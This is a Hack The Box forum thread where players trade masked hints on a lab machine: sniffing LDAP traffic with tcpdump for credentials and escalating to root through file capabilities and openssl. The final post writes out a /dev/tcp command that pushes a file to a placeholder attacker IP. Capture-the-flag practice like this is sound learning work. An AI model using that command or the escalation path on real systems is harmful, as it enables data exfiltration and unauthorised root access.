Lightweight

189101214

Comments

  • finally rooted , the box its pretty nice i just mess around in the start a few hours , after with the help of @brianma i get the way, thanks i learn a new things and good job for the creator .

  • I ran tcpdump for an hour and dont see any ldap traffic unless I generate it. Can someone PM a hint?

  • Without spoiling the fun...

    [+] The first 6 or so pages here have EVERYTHING you need.
    [+] Shut up and listen to the box. Listen in the right places.
    [+] Pay close attention to what you see on the web server. Seriously.
    [+] When in doubt, RTFM. Then RTFM again.
    [+] Still stuck? Google is your friend.
    [+] For root/root shell; if you can read, you can write. Leverage that.

    This was actually a really fun box. Little janky at the beginning but honestly, I think the creator did a pretty good job of combining real world issues with a bit of CTF flavor. Not bad at all.

  • edited April 2019
    Need help. I have t*****p. I have found what looks like a string associated to a user. But unsure what Todo with this? I cannot use it for SSH? Any hints?

    Edit im ashamed i even asked haha
  • edited April 2019

    hey,
    i could also need some help :/ i used t*****p and found something that looks like creds. although they seem to work with l**p for l*******2, i cant get anything out if it..
    PMs are welcomed! :)

    Edit: rooted. Fun machine and learned some new things.

  • edited April 2019

    need help with the tc****p command, not sure if im being too specific or have the wrong flags

  • edited April 2019
    I'm stuck here. i got the 10***** login. I have used the tc****p to capture any packets. i got a S***r H***0 packet. i'm using wireshark to read it. I see what looks like a hash but has ... on the end. I'm new to this all and love learning everything I can, but now im stuck. anyone will to pm me and discuses whats next or maybe a link to a site to send me in the right direction.

    edit got both users stuck on root.
  • edited April 2019

    I am stuck on user. I have used tc****p to capture packets and output it to a pc** file but I cannot find anything in it. Anyone can give me some hints?

  • hmm, time to ask for some assistance. I have been looking at tc****p and jx**** , have goit packets, i understand cant used the $6$ salts, looking in packets for some type of message. Should i be looking at this on the host itself or the client, going round in circles here, could someone give us a nudge please.

    Demonseed74
    ccie|ccnp|ccdp|ccip

  • I was able to figure out how to get user2 password by reading the comments in this forum. However, i have no idea how it actually works.
    What am i seeing with t*****p? What is that string that is used as the password?

    Can someone PM me and explain to me or point me to a good article? Im having trouble understanding how I got this password

    Thanks in advance

    wiseguy

  • Anyone willing to nudge me on this box?

  • anyone able to give some assistance on root shell. got all flags, but have been hitting a wall on root shell, have been using capXXXXXXXXXXies, but i must be missing something, as i cannot complete it through to being able to get to root

    Demonseed74
    ccie|ccnp|ccdp|ccip

  • edited April 2019

    If any one can help push in the direction for rooting? I have an idea that it deals with o*****l and /***/s****w. Dont know if im looking down a rabbit hole or not. Thank you

  • Owned. Really liked this one!

    No CTFish at all and it forced me to learn a lot of things. Nice!

    If you need any help feel free to PM me

  • got it, root shell, missed a stupid step,

    Demonseed74
    ccie|ccnp|ccdp|ccip

  • Root needs literally 1 minute, don't overthink. You have 2 things over there, 50% and 50%, you have good chance to get root flag at first try like me.
    You can root shell too, if you can read root.txt that means you can write root files too, but it's not necessary to do because you risk to broke the machine and ruin the penetration to others :)

    For anyone with problems with t*****p on the initial phase: I don't know how, but yesterday I didn't get anything, today in 5 minutes I got 3 connections.
    I don't know if someone wrongly helped me with a enumeration to that service (like requiring a reset from web site or getting banned for bruteforce), or if there is a cronjob.
    I doubt yesterday machine was broke.
    So, while you are using t*****p, try to do something to the webserver to force PHP sending requests to that service.

    If you appreciate my help, please give me +1 respect :)
    https://www.hackthebox.eu/home/users/profile/113070.

  • edited April 2019

    Hey guys can a capability guru PM me please? I got root but I am not 100% sure why. I have a theory but I would appreciate
    if someone could confirm.

    Read a different man file and I got my answer thanks :pensive:

  • I ran t****** for hours but still i cant get anything.I just get the ldapsearch, web related traffic but no noise captured I made around 10-20 different pc** file even imported as normal text so i can look for anything missing but still no good can anyone help me with that.

    sahil0x08

  • Can somebody give me a hint about root shell. I've successfully did a reverse shell to my PC with o*****l binary, but get it under ldapuser1. Don't understand where I'm wrong.

  • I have been struck in user for days now.I'm running t*****p inside the box for hours and hours looking out everything I can still unable to get that information for the user. Am I doing something wrong or just I am unlucky that I can't get that.

    sahil0x08

  • Type your comment> @sahil0x08 said:

    I have been struck in user for days now.I'm running t*****p inside the box for hours and hours looking out everything I can still unable to get that information for the user. Am I doing something wrong or just I am unlucky that I can't get that.

    Finally rooted the box thanks to everyone who helped me out after getting user it was like hell lot of easy to root the box.

    sahil0x08

  • edited April 2019

    Edit : Got root ^_^

    Fun little box :)

  • Wow this box was awesome! Didn't have any knowledge on capabilities... Could never root it if it wasn't for all the people hinting at them :)

    For people struggling with root, search well on google for this!

  • Type your comment> @xnand said:

    Wow this box was awesome! Didn't have any knowledge on capabilities... Could never root it if it wasn't for all the people hinting at them :)

    For people struggling with root, search well on google for this!

    don't google too hard. while doing the same as you i found literally a write up on this box. complete with l*******1 path names.

  • edited April 2019

    I got user & root.

    A very nice box, the priv escalation was amazing. RevShell here.

    PM if you need help.

  • Nice box!
    Got user, root and root shell in a funny and illustrative box.

    Thanks to the creator :D

    rulzgz

  • Nice Box!! learned alot about the ldap request and the forum comments helped.
    got all the flags and Rooted!!
    Hack The Box

    My YouTube Channel => https://www.youtube.com/c/NatzSec
    You can subscribe if you want :P

  • Got user and root, really learned a lot from the box (and this forum),

    Thanks to the creator for the fun and challenging experience! Feel free to PM me if you need any help with User or root

  • Left this box months ago and came back still stuck at the same point , tcpdump doesn't come up with anything wile listening on either ens33 or lo , only time anything ever comes up I do an ldapsearch that doesn't contain any bind info

    Hack The Box

  • edited April 2019

    Got User, working on root, I've done the whole cap privesc on a different box, cant remember which one atm. So I should pop this bad boy before I head to bed tonight. But before I finish and write my review I want to share a quick tip for anyone doing this box who is having trouble transfering files

    cat FILE >& /dev/tcp/YOUR-IP/PORT

    should do the trick, just dont forget to setup a netcat listener on your kali box that pipes out to a file.

    Hack The Box

Sign In to comment.